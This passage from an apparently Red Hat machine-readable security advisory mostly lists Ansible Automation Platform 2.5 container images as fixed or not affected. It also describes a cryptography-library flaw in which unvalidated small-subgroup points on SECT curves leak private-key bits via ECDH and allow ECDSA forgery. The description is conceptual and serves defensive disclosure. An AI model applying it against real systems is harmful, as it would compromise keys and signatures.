"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8@sha256:268a35d7a2bb13547826ec27291d5b48b2abe1d530b49a6085fcdde9410b61f8_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8@sha256:985cf2d3da53a542a87d98e4b698f53cf9b99e1a09e86b206f42c96833c2b35c_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8@sha256:9cda51df51a24542cd1cd9cd4c072389340d0e678d82236d38c64568cf5d552d_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8@sha256:fe9512b0361734dcaa41b19c4f02b36ec45896ff911dd44a9e821fdd60d30374_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-ui-rhel8@sha256:17c4c5a579c802fc9a4ee935ad723f65c63aa63ce3b5e4a91705c12ec59feca6_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-ui-rhel8@sha256:3b3a79cebad3f9230b476752c3a6dc29b3d5179d0a3fcf90707eaf14da11ae84_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-ui-rhel8@sha256:a28642cbd593dcdd8673c4bdac30da6eafba29e8abc4ddeaa12369177b5052c7_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-ui-rhel8@sha256:bd47ed866c9bee7c22e7fafcb959df87f64abdbea9f38603a377216f99be3b43_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-minimal-rhel8@sha256:1254e449d313f5f663d056097b9cddbcd7fce91c7a6448b1d4f57c622d9556b3_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-minimal-rhel8@sha256:8523ece411bf1842b9309abc7dea7067a26a0efd6cb0510449a6573df820a45c_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-minimal-rhel8@sha256:bde426912de4c15616e3b71408f4760fd12172dc97ce15d5511d0094784643eb_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-minimal-rhel8@sha256:c87feb6c292b8f95cc840237e3a498eaa3198447f11bb3dd652818e1128bf4a4_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-supported-rhel8@sha256:6547c593ea515750150478d442e17f113fb76ec611f6d7c2ff62223e1742a083_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-supported-rhel8@sha256:d6fe585bac62fd646127894dcb9bf55462daf60a22c8721ee44658fbdd3e99a6_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-supported-rhel8@sha256:e8c26f06cca6450dc68a6160a6d1ababdf0992ed9000f27dea5177b813671653_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-supported-rhel8@sha256:eab05f26b14dd06d7e4f5580a873d8bdb18317abf1e82300da089cba5129bdb4_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-proxy-rhel8@sha256:049878acbb0f6297eae90180b88b011d00e954285d3197e2c19bc17e82f67523_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-proxy-rhel8@sha256:6624a8e702ff2bc3f07b63a8fec42034c48b41bb187818fd4f2dd8a8f60766cb_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-proxy-rhel8@sha256:b829b37753a3d14aebf4d114973f843dfc6e4706cf2375408bab8950ab15d2ff_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-proxy-rhel8@sha256:c41ad877f30bc37bd9fe8422c410da12159b8fba7ab9ed0fd174e0d30a1ed125_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8-operator@sha256:47315b849e1e70f6240f310ed5b6d402f6512973bd94bb70d9138d03b790b1a8_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8-operator@sha256:8b63224e8726db24bf51a5456ef9ede17299e1d920d57a66c49be8a03d3485ed_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8-operator@sha256:9a20dbc471286e91b2687c22b692a335b287f8eaba817c0f4b6c31b42a669b94_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8-operator@sha256:b104daa98ef64f2be52d0066ca490a98ef3380a4516038711972be8c01a16571_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8@sha256:0b65799b577e98beaa59b850028bbfc2d2b112465d1661cd6ab90fb0dd296695_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8@sha256:116d10699e27737b256b1ccd035c65334696553d107c1002eb85be69aec4c65a_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8@sha256:78bb5cce2e05156b39a961747174a819c945298fb2f444ef321de6f2bbd5ac5b_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8@sha256:9b3fd70beaca874656c8e051fa6b3f04b8cbc99e61278a953832637c8c0fb18a_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8-operator@sha256:0997e7c2515f817d857c9c3dc157f7adec41553adfc3a22913bd65c90b1c9924_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8-operator@sha256:bac6445179c1c27314e958b41b3d67b1d34dcb05ac9a360a8fe297ab631d64f7_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8-operator@sha256:d55d0744741b5fcd00107cc2a443dec11696a5daa453a4d992f1e15c3f4708b2_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8-operator@sha256:dec36413a14d42948aa73339aaba4e5b22f38ddc364436c66ab9d1a8aac465b3_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8@sha256:1074bbb8a68b75e8c8635bc622bf059cf0ae5bf582d48af31eca9bfc4f4787e8_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8@sha256:1d1f1078e7a5d916a6df61d83b6c38512a4f1e6ca71d91212fd539aa3be4d8ed_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8@sha256:c8fd574a2ddb034be88d78b49ae22de5fea68679c0a9f1f3e24583ef118fb532_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8@sha256:f1abc733921423176ccd6bc3b31093c151b84bdfa9a82b1f640a540edbfbf358_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-web-rhel8@sha256:0bdf70b361111ad28cc4c5a38a52fb7557a7256c45d31b9c187fba4213c1080d_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-web-rhel8@sha256:20537bc868859605ba1a227b8ffaa4523c03b67093e71e910d8cb3b8fbe0392d_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-web-rhel8@sha256:6481c675623cee9bcabd4a1c3a04d169c46e103c944af5ef69a75fc9bd69dfb8_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-web-rhel8@sha256:e474929fa188b73d80eee028cd51e54f07157e587071cf60109f4398ea4dce30_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8-operator@sha256:3cbb5b8c06d7911476e411419ff88a02126e0a6f4f514247e112afc9f939c80f_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8-operator@sha256:433143f26cf3ebbc1e6492d8e6b96a0fe82dbb46a54859e9a10fef1e5f71842d_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8-operator@sha256:c7b4a67cf4b2a1fece30e67d57c67d850d6f9866cf6fc39206b4ca09956e4deb_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8-operator@sha256:f1d3f1a1c0396fa4f3b5496af6a6d2dfc231c8d8bc453774b2c4319bfd00b96e_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-rhel8-operator@sha256:7686b10f4f4091c5e56ce58c6c12f6cff0b7d5fd526fd606e92abf75eb6b13c2_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-rhel8-operator@sha256:c20cc51275c70431b1e730ca48a82942c5385bba90aeb514e01fd3e142c158d0_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-rhel8-operator@sha256:df33172c1cb33952183c80ab0f86c5f414a5103b9eb0757f744103678a6992ff_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-rhel8-operator@sha256:e0c6a368dc6da0906c102aa3587b297e7fe4d4072b5b019a2f3e1a0d54c8053b_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-runner-rhel8@sha256:5596feea40bd5eaf4e97a7eb33c4e7069e802fc921e1fa5fd65b7db9ff99637f_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-runner-rhel8@sha256:b4bf1128add34cd02dbb769b2445af2491cb1fe3b23d8aaecdff3044ecb889be_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-runner-rhel8@sha256:ce70350c29cfb97ebfa8f0782b6c193c1693704cc184c039329df915aeeaaaa2_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-runner-rhel8@sha256:f700beaf7b8466e958876ea71762439e9b7224f34f066a72e3454b7ab450e0cb_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/receptor-rhel8@sha256:05a079835148d3cb9357e0c911ba78646748c4373b4f39cb995fc6f6a1d35315_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/receptor-rhel8@sha256:43e267abfa4d52a2fb3677406ee8c7a44cb7ddecb94fe13b852546eb4a8c2b99_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/receptor-rhel8@sha256:b8ad28fb112c9f076499050ed7f27e1fce701bbc9cf3c1835c113a6a0bd9e915_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/receptor-rhel8@sha256:e34860aa425dc582c6e2214d5762a31e84f62d905469b3f130fc3980a03c36b1_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:8a3978970e82e80c57d44ef3187049eaf58b715460442363a239bf023db64791_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:bc8fc8ba010f7e49b2c9a1b8994d6de05650f8028b2c6dbb0db3e721ed53cdef_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2438762"
}
],
"notes": [
{
"category": "description",
"text": "A validation flaw has been discovered in the python cryptography package. This missing validation allows an attacker to provide a public key point P from a small-order subgroup. This can lead to security issues in various situations, such as the most commonly used signature verification (ECDSA) and shared key negotiation (ECDH). When the victim computes the shared secret as S = [victim_private_key]P via ECDH, this leaks information about victim_private_key mod (small_subgroup_order). For curves with cofactor \u003e 1, this reveals the least significant bits of the private key. When these weak public keys are used in ECDSA , it\u0027s easy to forge signatures on the small subgroup. Only SECT curves are impacted by this.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "cryptography: cryptography Subgroup Attack Due to Missing Subgroup Validation for SECT Curves",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This flaw, while difficult to exploit, would lead to a loss of integrity in the encrypted communication channel. Given that the cryptography package is a library, it is likely to be used in situations that do not require user interaction.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-chatbot-rhel8@sha256:2f9ec28f18893b516b9dadcce88a8efaa908e916305f7b802f250c2283c37cb5_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-chatbot-rhel8@sha256:3e61238b7400447dfd7999d053e7f701d7c84d62e4a0ef29950c39f3843fb467_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-chatbot-rhel8@sha256:9bbe1c621a8ee4c960e945c0f1a57c89654314435ea00083abbeb390991c62bb_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-chatbot-rhel8@sha256:c3451ed3202ea6b8328f1cacd4fe0205df1fa0d3eec3a960873ec493e9d49d67_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8@sha256:0682e9e4bc9ad2b2b564fa2fa8b022e46729b27e26ec7b14ed2f1fae3e52a0d1_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8@sha256:2f25f26750ceac18fd9c059eb3f11cc400dc0160d9ca78eded86af360c81d201_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8@sha256:360d270a9167d79e297b050093209bcc9e0d854045b9ba116192073ce44c662c_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8@sha256:7d75c8ac498141ba26b4a927dbc4b4426a566da5ba09d4e0017fbf715bd05b27_arm64"
],
"known_not_affected": [
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/aap-must-gather-rhel8@sha256:0f8839e5aee29a659fc87dbe1974d52807b02232b12bfae0a9ee75f72f6822d8_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/aap-must-gather-rhel8@sha256:cbed194c572c59551a2b73e61d8c3821df77d5a9ca7d2275062c439996a24eb4_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/aap-must-gather-rhel8@sha256:f501719d54fc49e168385702bb0e1d8432b65f129a56a8fe184557a715956196_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/aap-must-gather-rhel8@sha256:fe250f135f03aecf8489c1cee9721b9e48549e19d5a609a3d3284fe7d758a34d_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-builder-rhel8@sha256:6fd7c632b981a1b0593c6af234c4b40d1046eabebe41ce29f75e1e010e92226a_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-builder-rhel8@sha256:b8d2a7da8627fa6a020330453c9fee31ba37a8eddd2d014fafa5bf3ed838fb5e_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-builder-rhel8@sha256:c264a07ccc7020902897cc9420a76dc590431596fc74696b57e42c2cc658a3f7_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-builder-rhel8@sha256:de9acb254c64d4b5f060867ac81c3c7b92da197bd62914705f47f81c719000f9_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-dev-tools-rhel8@sha256:299e584db6227b51630ff777864b19113e8a1ea8100aa5c1bde092f730f35911_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-dev-tools-rhel8@sha256:3aae092b74e73969f4328e406f804297e44130fea3232db3403db98463e42d9c_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-dev-tools-rhel8@sha256:b77247eccd37c9bc29631142605c6fab3af9d23ebf82b43f049664e44193d377_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-dev-tools-rhel8@sha256:f1eb81b968bdee5bbfa48e25718ac574bdda09c2acf726d9f058e0643585d59d_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-base-rhel8@sha256:009336407c386ffb1f5f1bdb7a38256e73b8b2ec97036f8ab84e7293f517ef8e_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-base-rhel8@sha256:82e4da659d4bbf036bafee5f598602ec32b7b5f8d3d595287dcf418288bf2147_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-base-rhel8@sha256:8ee6e0938cc2189984009da95ebd6fb4f5946cf9e1f7ef7aae8d6f40dfc7ab36_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-base-rhel8@sha256:90d90e31d0afe833778743baf4eb3527402a65c30fdcce149ff8d4820faa3781_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-toolkit-rhel8@sha256:34bfde79221d2f824177f72d68a877b63bfe88b1f0562741a2dc212f83cb4e62_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-toolkit-rhel8@sha256:c25356366526086b2e85274793b8e9dadf1a04d35515087d4421c74bb9b4bacf_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-toolkit-rhel8@sha256:c5923a2649845cc20cdc2d015442d8007e9e0f77522d652d8af389437681c4ed_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-toolkit-rhel8@sha256:d91f808a230d11c3b998cbd703fd8fd043188164f61962b5518cda91ad19712b_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8-operator@sha256:0d79e8c5f3f36c290006c0adbe7c14f57bad10566017f005ae4073905b170136_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8-operator@sha256:57bf7919da3de08961e4c151b08dab1c756353a4040d0dd66feb72fcfe1cc8ce_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8-operator@sha256:6d0a4b9c41713e592707a1b93d48f197977bf9eb05aa5e87a083976720061cbb_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8-operator@sha256:c6d21fc02716334ab7f6c48ba7d102965d197209c5a9fd3b41a6ea65b5da0055_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8@sha256:48f4971662ddb841e25bb610f72ef5f37eddf482b117786595d80d0931448236_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8@sha256:6ec99dbde70c05dc5fbd64f81779f75ca8a131c0d3865f1be318a4cd8152ed33_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8@sha256:783723cc28521153aef6aeaee7786f8bb87e01ef738b90b8b5fb2f2b2fb6c780_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8@sha256:7c13d95770002e16dbd5dc86ea82f6fc5e70828582b928d9e3388ecded90b67a_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-minimal-rhel8@sha256:7188e3f507cdaa346ed930c158379a67104dbdc74535a2b5a541cea60c03a123_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-minimal-rhel8@sha256:85c083ae0b2493347cbf1e5885ad56335b1799e545f136118cfe597f39f3df6e_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-minimal-rhel8@sha256:c5079720f6ea2ab7fb6b1acc6fa0c3c5087d91507c2fb21bb5b4ebc57953b4cf_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-minimal-rhel8@sha256:f250376b2a72ff2e0bd866bbd8142c5e071218351ad62c52cd7b7a6f3baab026_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-supported-rhel8@sha256:0a10e9afd9c3d555a36db84f938973f14fb099164b1ba5068f9e5a9cfec51f01_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-supported-rhel8@sha256:1fcab1dccdd7ab7976ac0a57fad193d9411aecdc82cc24752378589978ab3c83_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-supported-rhel8@sha256:21636d382f0a42b7d87d3b1f4ee53bf73e589bb549750d279ca21f96517d7a3d_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-supported-rhel8@sha256:ac48a386cf9175fa667538475607d8d7444e2d21e77bea8ce8d3bf291c59d4a0_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8-operator@sha256:0e5a121065f55cb7381d74794dd44b02a564195bca3bdfd9d9a10905fd0995a6_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8-operator@sha256:3838ae2045ed11b4bfe2c86675a5bebe4f51971d30322af3721969e3e2fca06f_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8-operator@sha256:a23c10d8ea852924e8c89a80cb561b2ed9dbacb13257401181b9b13ddf6786ee_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8-operator@sha256:a592586194e5234cfcc2d783f876713771ac489c530205e87053a60b1dd90e04_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8@sha256:268a35d7a2bb13547826ec27291d5b48b2abe1d530b49a6085fcdde9410b61f8_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8@sha256:985cf2d3da53a542a87d98e4b698f53cf9b99e1a09e86b206f42c96833c2b35c_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8@sha256:9cda51df51a24542cd1cd9cd4c072389340d0e678d82236d38c64568cf5d552d_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8@sha256:fe9512b0361734dcaa41b19c4f02b36ec45896ff911dd44a9e821fdd60d30374_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-ui-rhel8@sha256:17c4c5a579c802fc9a4ee935ad723f65c63aa63ce3b5e4a91705c12ec59feca6_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-ui-rhel8@sha256:3b3a79cebad3f9230b476752c3a6dc29b3d5179d0a3fcf90707eaf14da11ae84_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-ui-rhel8@sha256:a28642cbd593dcdd8673c4bdac30da6eafba29e8abc4ddeaa12369177b5052c7_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-ui-rhel8@sha256:bd47ed866c9bee7c22e7fafcb959df87f64abdbea9f38603a377216f99be3b43_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-minimal-rhel8@sha256:1254e449d313f5f663d056097b9cddbcd7fce91c7a6448b1d4f57c622d9556b3_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-minimal-rhel8@sha256:8523ece411bf1842b9309abc7dea7067a26a0efd6cb0510449a6573df820a45c_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-minimal-rhel8@sha256:bde426912de4c15616e3b71408f4760fd12172dc97ce15d5511d0094784643eb_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-minimal-rhel8@sha256:c87feb6c292b8f95cc840237e3a498eaa3198447f11bb3dd652818e1128bf4a4_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-supported-rhel8@sha256:6547c593ea515750150478d442e17f113fb76ec611f6d7c2ff62223e1742a083_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-supported-rhel8@sha256:d6fe585bac62fd646127894dcb9bf55462daf60a22c8721ee44658fbdd3e99a6_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-supported-rhel8@sha256:e8c26f06cca6450dc68a6160a6d1ababdf0992ed9000f27dea5177b813671653_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-supported-rhel8@sha256:eab05f26b14dd06d7e4f5580a873d8bdb18317abf1e82300da089cba5129bdb4_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-proxy-rhel8@sha256:049878acbb0f6297eae90180b88b011d00e954285d3197e2c19bc17e82f67523_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-proxy-rhel8@sha256:6624a8e702ff2bc3f07b63a8fec42034c48b41bb187818fd4f2dd8a8f60766cb_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-proxy-rhel8@sha256:b829b37753a3d14aebf4d114973f843dfc6e4706cf2375408bab8950ab15d2ff_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-proxy-rhel8@sha256:c41ad877f30bc37bd9fe8422c410da12159b8fba7ab9ed0fd174e0d30a1ed125_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8-operator@sha256:47315b849e1e70f6240f310ed5b6d402f6512973bd94bb70d9138d03b790b1a8_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8-operator@sha256:8b63224e8726db24bf51a5456ef9ede17299e1d920d57a66c49be8a03d3485ed_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8-operator@sha256:9a20dbc471286e91b2687c22b692a335b287f8eaba817c0f4b6c31b42a669b94_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8-operator@sha256:b104daa98ef64f2be52d0066ca490a98ef3380a4516038711972be8c01a16571_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8@sha256:0b65799b577e98beaa59b850028bbfc2d2b112465d1661cd6ab90fb0dd296695_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8@sha256:116d10699e27737b256b1ccd035c65334696553d107c1002eb85be69aec4c65a_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8@sha256:78bb5cce2e05156b39a961747174a819c945298fb2f444ef321de6f2bbd5ac5b_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8@sha256:9b3fd70beaca874656c8e051fa6b3f04b8cbc99e61278a953832637c8c0fb18a_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8-operator@sha256:0997e7c2515f817d857c9c3dc157f7adec41553adfc3a22913bd65c90b1c9924_ppc64le",
